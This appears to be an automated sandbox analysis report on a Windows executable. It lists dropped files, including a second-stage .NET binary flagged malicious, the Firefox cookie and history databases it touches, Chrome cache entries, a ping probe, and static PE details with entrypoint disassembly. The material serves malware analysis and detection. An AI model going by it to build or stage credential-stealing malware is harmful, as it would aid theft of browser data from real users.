Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\ledger_timestamp

Download File

Process:	C:\Users\user\AppData\RoamingEBFBKKJECA.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	10
Entropy (8bit):	2.4464393446710155
Encrypted:	false
SSDEEP:	3:LuW7n:17n
MD5:	A4B16B1918F3723B3A3B7E355D5F22DD
SHA1:	22B2AB7F4106B7A6A2DE797BC54715F5FB1E55BD
SHA-256:	67DBD5AF42C019E24E6775A1F85FBC8E5FC490DE08674FEE054BAB36867955D7
SHA-512:	D49120D87CB734FBBF362CBE77446598610280144C52902E13966D32D3531C6EB6D9B8B6E69F0B4493721E89A7D7D454073F22CB0328818AAED36AC4A323D684
Malicious:	false
Preview:	1730573547

C:\Users\user\AppData\RoamingEBFBKKJECA.exe

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	109056
Entropy (8bit):	7.601271926021863
Encrypted:	false
SSDEEP:	1536:BICbUxKOcuS11Phbiyn2TCdfGyJVGJkyrt517EwM+UPTedxKOcuS11Phbiyn2TCf:2CbUsISnRGPJkGt74YsISnRF
MD5:	BA38615AB308EFBDB2A877277AB76CD0
SHA1:	DB1A7FB291820B7581F98CF0623462C431288E5E
SHA-256:	06A5989061AAC0564C43D883C74DC603F4489E149E04142D1BB7074B7E661BD1
SHA-512:	5FB878C7875C6F38664BF56389D432883933B2FF956FD9FA7475DA7926C4289C738FF7A1FB8A244D5E69F485B9520F678FFF90AE6673A9C15A4DE50A20518F54
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....&..........."...0..2...v.......Q... ...`....@.. ....................................`.................................LQ..O....`.. s...........................P..8............................................ ............... ..H............text....1... ...2.................. ..`.rsrc... s...`...t...4..............@..@.reloc..............................@..B.................Q......H.......d0...9...........j..............................................>. 4......(....2......o....:........o.....0..,........o....r...p $...........%...%....o....t....&...o......(....J.r!..p.s....(....Js....%o....o....&..( ...6.(!....(.......0..$........{....,...}....rK..p.s.......("...f..3...t....}......}......(#....~....-.r...p.....($...o%...s&........~.....~............~......('...Vs....((...t...........{...."..}....*..0..G.......s).....(.......+....

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.416654850607121
Encrypted:	false
SSDEEP:	6144:Tcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNg5+:Ii58oSWIZBk2MM6AFBSo
MD5:	98A49C2D115870A6E6DD6C18D0A80E52
SHA1:	27C3A1595DFAA6746FCA4261BE3C8162DFF6EA16
SHA-256:	CB0791D9BE0AD8F22DC6C5DB005CA3673A6A2E20CA42B946DAC0CD7DE62C4E53
SHA-512:	96DD60ABDCA8BC13CC528025235886E815EE847559EDC24F7152D9B3631A21E3131779027E3FB6A280D517B8FF792C71E4AC884039D5E463585BE37635868466
Malicious:	false
Preview:	regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...]X-.................................................................................................................................................................................................................................................................................................................................................i........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Chrome Cache Entry: 461

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.3503139230837595
Encrypted:	false
SSDEEP:	96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
MD5:	7977D5A9F0D7D67DE08DECF635B4B519
SHA1:	4A66E5FC1143241897F407CEB5C08C36767726C1
SHA-256:	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
SHA-512:	8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.GZmhE2vV14w.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTuKvZ-nsYNivRzfGpm8QSi6tMFrvg"
Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 462

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2287)
Category:	downloaded
Size (bytes):	178061
Entropy (8bit):	5.555305495625512
Encrypted:	false
SSDEEP:	3072:i7bpK2pOwPnpW+DsZDbnjuBv5Vjq3B30GSK20YOA2ZPnpm6UzDnI13o2Mn5Pz5R3:i7bzO6I+DsZDDjuBv5Vjq3B30GSXOA24
MD5:	2901E98725751AAF9E3A6DA8A0AE100F
SHA1:	9A03B9B58521464BEA5EFDB95898D7A4DE2D66C6
SHA-256:	783C8FCA9918286C64FDD9C6DF8BB841815E5F6BA7BA95424DF63EA1ACF01B2D
SHA-512:	21235956E9B45B0C78055C8862072DE63FB1971F6396945610AC925A3E9D2D9FFAEC996DF4A64B33BC57B0EF6CF185A68DAC17D9AD5E570277CDD2BB869C9EBD
Malicious:	false
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.mTUNAFoITms.2019.O/rt=j/m=q_d,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTu-nsZOrMYTmX5E4o0SDpwg5MUFYA"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.kj=class extends _.Q{constructor(){super()}};.}catch(e){_._DumpException(e)}.try{.var lj,mj,oj,rj,uj,tj,nj,sj;lj=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};mj=function(){_.Ka()};oj=function(){nj===void 0&&(nj=typeof WeakMap==="function"?lj(WeakMap):null);return nj};rj=function(a,b){(_.pj\|\|(_.pj=new nj)).set(a,b);(_.qj\|\|(_.qj=new nj)).set(b,a)};.uj=function(a){if(sj===void 0){const b=new tj([],{});sj=Array.prototype.concat.call([],b).length===1}sj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.vj=function(a,b,c,d){a=_.zb(a,b,c,d);return Array.isArray(a)?a:_.Qc};_.wj=function(a,b){a=(2&b?a\|2:a&-3)\|32;return a&=-2049};_.xj=function(a,b){a===0&&(a=_.wj(a,b));return a\|1};_.yj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.zj=function(a,b,c){32&b&&c\|\|(a&=-33);return a};._.Dj=function(a,b,c,d,e,f,g){const h=a.ea;var k=!!(2&b);e=k?

Chrome Cache Entry: 463

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (4121)
Category:	downloaded
Size (bytes):	4127
Entropy (8bit):	5.831122016138452
Encrypted:	false
SSDEEP:	96:kuliLIN6666VeSDxRSxQwKcfXKXC2L+OeCwkCbfffQfo:kEZN6666VeXxQ8f0C2L+Og
MD5:	E409E9B935178BFF06ABFBC999869F70
SHA1:	A53D366500E0C7DE0D4BC2F553074662D0318C7C
SHA-256:	AF50B80A9F558AA127CE4F4A8DF82F9505AB6CD3EEF0F880F906CB1A71CBD51F
SHA-512:	DE6D45290D82D0193147CF339F399D96BA7B39222B037E4860EE7FAFDA9A2DBD4757B6EF277D7FD64129ABA3F86DDADC6CCAF02C76ABE0171EAA90E1C7135200
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["beau shroyer angola africa","holiday christmas drinks","the diplomat season 2 netflix","pok.mon prismatic evolutions","darryn peterson basketball","hurricanes tropical storms","diwali festival","starbucks holiday drinks"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"Cg0vZy8xMXJxdjdjbjNoEhFCYXNrZXRiYWxsIHBsYXllcjKjEmRhdGE6aW1hZ2UvanBlZztiYXNlNjQsLzlqLzRBQVFTa1pKUmdBQkFRQUFBUUFCQUFELzJ3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBRUFBUUFNQklnQUNFUUVERVFIL3hBQWFBQUFEQVFFQkFRQUFBQUFBQUFBQUFBQUZCZ2NFQXdJQi84UUFOaEFBQWdFQ0JBUURCZ1VEQlFBQUFBQUFBUUlEQkJFQUJSSWhCaE14UVZGeGtRY1VJa0pob1NNeWdkSHdnc0ho

Chrome Cache Entry: 464

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 465

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	133762
Entropy (8bit):	5.4366555125888665
Encrypted:	false
SSDEEP:	3072:2P4vjxd0QniyZ+qQf4VBNQ0pqhvx7U+OUaKszQ:E4vv0yTVBNQ0pCvxI+ORQ
MD5:	29051ED74C99EF4FFB19BEDF0E1C97C9
SHA1:	87D87C6F31214D408165FF7773F3ECB53D900004
SHA-256:	24646D6193A2DAA92141AA8A902FF09B50446987134367E53DD6BE9200811AF0
SHA-512:	8343FF4E84F6D1349747A50F441B41CB8593372F17560C2C26F686E91C5328CD741D5825604880D79FD19BC7B1EC53943CB94E78BA487E7A03BE35CFFCCD40A6
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_1d gb_Pe gb_pd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Od\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_jd gb_nd gb_Ed gb_kd\"\u003e\u003cdiv class\u003d\"gb_vd gb_qd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 466

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	154
Entropy (8bit):	4.657087708381722
Encrypted:	false
SSDEEP:	3:mKzGzjNpmWiA3WqUQkotZwg9WseIHN8SZRFpNjLG4JNWMmvn:PzKmWxGvQesWs3NRTZK4JEMmvn
MD5:	F4826E7FAEAA26C8CDF34D9BF25884E8
SHA1:	0B56D3DABCE3D805BD9CCA333155ABC83875E2B4
SHA-256:	18768ABE140AA9BA340E592DEC06624C29BC814BAD44569F68FE1C6CE69CB145
SHA-512:	D8B2632ACA9632C258037F90094EAB1AAD66E271F22783D7FABD0CB2F0A0EE7E7BC2EC8C289747F1FCE5F50BE78DFB9560BCD8BDB27DF1E21F5ACA6C40B9614F
Malicious:	false
Preview:	..Pinging 2.2.2.2 with 32 bytes of data:..Request timed out.....Ping statistics for 2.2.2.2:.. Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.4656629858354755
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DbMBWMxoNv.exe
File size:	665'088 bytes
MD5:	f4f514d2d0e346e0e6989aeba521f777
SHA1:	23abd633a46011c02a27f9d73f4a5af172396d7f
SHA256:	578120dbd088c4de4e03899efef9c145bf6a41c6cbed56d84b2291e037028ba7
SHA512:	b91312b55c67afc0e689e09c99e691ccb4ac35e3a426e925f195fe345de8528a431782901bbcb18c6222c8e7b57330fe5427b5307fc6e9eb5da0d57345b17b06
SSDEEP:	12288:NDVniVpz53KOI4CDNAZsnYNdGCTZaQY0OGcb:HGJq4SVnuTPL0b
TLSH:	91E40230AAF69623F6F349344A38A69416F7B873197491BE2149375B0E316D0AF32737
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.O7".!d".!d".!d...d .!d<..d..!d<..d6.!d<..dS.!d.WZd'.!d". d^.!d<..d#.!d<..d#.!d<..d#.!dRich".!d........................PE..L..

File Icon


Icon Hash:	738733b18ba383e4

Static PE Info

General

Entrypoint:	0x40160d
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x64D37FC5 [Wed Aug 9 12:00:05 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	7870080f1526ffe78476c41f92dca011

Entrypoint Preview

Instruction
call 00007F1040D2A7D4h
jmp 00007F1040D269CEh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0048FE38h], eax
mov dword ptr [0048FE34h], ecx
mov dword ptr [0048FE30h], edx
mov dword ptr [0048FE2Ch], ebx
mov dword ptr [0048FE28h], esi
mov dword ptr [0048FE24h], edi
mov word ptr [0048FE50h], ss
mov word ptr [0048FE44h], cs
mov word ptr [0048FE20h], ds
mov word ptr [0048FE1Ch], es
mov word ptr [0048FE18h], fs
mov word ptr [0048FE14h], gs
pushfd
pop dword ptr [0048FE48h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0048FE3Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0048FE40h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0048FE4Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [0048FD88h], 00010001h
mov eax, dword ptr [0048FE40h]
mov dword ptr [0048FD3Ch], eax
mov dword ptr [0048FD30h], C0000409h
mov dword ptr [0048FD34h], 00000001h
mov eax, dword ptr [0048C004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0048C008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000E0h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8a96c	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2797000	0x10c90	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x89000	0x1a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8733c	0x87400	a3dbc006874ee6b49ee331d095e65138	False	0.9223912603974121	data	7.8442702934920465	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x89000	0x2316	0x2400	e7027a85c993356b5df0472ac91c7a0a	False	0.3683810763888889	data	5.552835289027215	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x8c000	0x2703b38	0x3e00	74b51757a1ad241ac1f59f4c523608b7	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.seziw	0x2790000	0x4400	0x3800	b211778b80f6d441b6cf61ada776fc6d	False	0.0025809151785714285	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bejec	0x2795000	0xc	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.fedebi	0x2796000	0x400	0x400	0f343b0931126a20f133d67c2b018a3b	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2797000	0x10c90	0x10e00	8606e228afffa6684ddf679d1680a5fa	False	0.44697627314814814	data	4.977933463642845	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
JUPILAMADUSAGIGIXOYANEXUF	0x27a1dd8	0x3fa	ASCII text, with very long lines (1018), with no line terminators	Turkish	Turkey	0.6237721021611002
KIZEWEJAJUDIM	0x27a11e0	0xbf7	ASCII text, with very long lines (3063), with no line terminators	Turkish	Turkey	0.6010447273914463
RT_ICON	0x27977e0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.3283582089552239
RT_ICON	0x2798688	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5117328519855595
RT_ICON	0x2798f30	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.5501152073732719
RT_ICON	0x27995f8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.5874277456647399
RT_ICON	0x2799b60	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.420850622406639
RT_ICON	0x279c108	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.49836065573770494
RT_ICON	0x279ca90	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.50177304964539
RT_ICON	0x279cf60	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.38646055437100213
RT_ICON	0x279de08	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5392599277978339
RT_ICON	0x279e6b0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.6094470046082949
RT_ICON	0x279ed78	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6380057803468208
RT_ICON	0x279f2e0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.40126641651031897
RT_ICON	0x27a0388	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.39344262295081966
RT_ICON	0x27a0d10	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.4370567375886525
RT_STRING	0x27a23b8	0x144	data			0.5216049382716049
RT_STRING	0x27a2500	0x850	AmigaOS bitmap font "e", fc_YSize 26880, 20480 elements, 2nd "i", 3rd "v"			0.4149436090225564
RT_STRING	0x27a2d50	0x3e0	data			0.4637096774193548
RT_STRING	0x27a3130	0x31e	data			0.4799498746867168
